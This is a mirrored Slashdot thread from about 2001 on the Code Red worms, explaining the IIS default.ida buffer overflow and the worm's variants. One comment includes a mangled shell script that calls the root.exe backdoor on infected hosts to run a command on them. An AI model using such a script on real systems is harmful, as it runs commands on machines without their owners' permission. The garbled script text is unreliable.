Slashdot Mirror
Code Red III
drcrja was the first to send us this brief bit about Code Red III which is apparently faster and more vicious than its entertaining predecessors. I'm still wondering what I should do with the hundreds of IPs in my desktop's apache log trying hopelessly to overflow my buffer.
Actually, if you add a line in your httpd.conf that looks like this:
.ida
.php .php3 .ida
AddHandler cgi-script
then you can use Perl to write a quick script which will do the reverse lookup and then send that email. Or, if you want to use PHP instead, alter your AddType line for PHP to this:
AddType application/x-httpd-php
Then restart apache, and throw a script named default.ida up to your DocumentRoot directory.
-Chris
I threw together a script a few nights ago that sends such a popup to every CodeRed2-infected server that's contacted my server. It's available at http://salfter.dyndns.org/codered.shtml if anyone's interested. I also have live log info available there...got only about two dozen hits from the original CodeRed, but CodeRed2 is at 3500 hits and climbing.
Since the list is fairly lengthy at this point, let's see if I can sneak the script past the lameness filter:
#!/bin/sh+ %22Your+w\Y ou+have+a+security\h +it.+You+should+fi\s +advantage+of+it.+\s cripts+\(or+wherev\i pts+is+the+default\
http_proxy=
for i in `(echo use apache2 ; echo 'select host.host from transfer inner join\
host on host.id=transfer.hostid where requestid=2058 and transfer.time>"2001-0\
7-31";' ) | mysql | sort | uniq | grep -v ^host\$`
do
echo -n Sending Code Red message to $i...
result=`ping -c 1 -w 3 $i | grep "100% packet loss"`
if [ -n "$result" ]
then
ec ho host is down.
else
ly nx -dump http://$i/scripts/root.exe\?/c+net+send+localhost
eb server+has+been+infected+with+the+CodeRed2+worm.+
+h ole+so+big+that+you+can+drive+a+Mack+truck+throug
x+ it+before+some+script+kiddie+comes+along+and+take
+R emove+root.exe+and+shell.exe+from+c:%5Cinetpub%5C
er +your+CGI+scripts+live,+though+c:%5Cinetpub%5Cscr
+l ocation\).%22 >/dev/null
ec ho message sent.
fi
done
Damn...looks like the lameness filter didn't throttle it, but some extra spaces got thrown in. The spaces that need to be removed are fairly obvious, though.
20 January 2017: the End of an Error.
From The Register
Best Slashdot Co
There were/are three versions actually. Incarnations 1 and 2 had the same purpose though. CRv1a (I think that's the accepted name) had a rather dumb random number generator. CRv1b had a much more targeted random number generator. CRv1a and CRv1b were very close in code though. The code for v1b was in v1a, but wasn't activated. The author had it just jump over the not-yet-wanted portions. You can spot a CRv1 attempt because it uses N's to fill up the buffer.
CRv2 on the other hand (which is technically the 3rd release, but the first two did almost the same thing) fills up the buffer using X's and then opens the backdoor, sets up root.exe in the scripts/ mapping, etc. Totally different codebase from what I gather.
In all likely hood the media is confused. It wouldn't be the first time. I figure if there's a CRv3 ever out there it won't be near as nice as v2 is. I'm thinking massive damanage upon infection to the machine... but not enough to keep the worm from spreading.
Justin Buist
I'm still wondering what I should do with the hundreds of IPs in my desktop's apache log
should we set up a site somewhere of ip addrs?
Already got one! Remember, the list, including fully-qualified hostnames, is for _educational_ purposes only. I've made it available so that we can study how this thing moves, not for such purposes as mass-spamming postmaster@$IIS-INFECTED-HOSTNAME with flames reminding him that he is a bliterhing idiot, nor for other untoward activities which may be performed on a machine with a shell in a webserver's public directory.
Fire and Meat. Yummy.
What happens is that IIS sits there, waiting for Web browsers to request pages. A Code Red infected server starts randomly picking other computers on the Internet or the network, and requests them to send a Web page called default.ida. It then passes a huge parameter to default.ida.
Apparently, default.ida has hard-coded a maximum length for parameters -- say, 200 letters. (Probably not actually 200 -- but you get the idea.) That's what all the XXX and NNN's are there -- it's the 200 (etc.) letters that's the most default.ida is expecting to receive. A buffer overflow is when something goes past that maximum number of letters, and a program with a buffer overflow problem usually does something strange with the information past that point -- in this case, default.ida takes everthing after that number of letters and runs it like it were a program.
Normally, this would just crash IIS (since it's getting a bunch of garbage, and running garbage makes programs crash) but Code Red is purposely designed so after the right number (200 or whatever) of XXX/NNN's, it tacks on the code to infect the computer with Code Red. So, IIS runs the code, the computer becomes infected with Code Red, it starts trying to spread it to other computers, and the whole cycle starts all over again.
You might be interested in this article titled, "Securing an unpatchable webserver"
Key to financial independence: Spend less than you earn. Save and invest the difference. Do it for a long time.
According to Symantec's page on CR2:
Also Known As: CodeRed.v3, CodeRed.C, CodeRed III, W32.Bady.C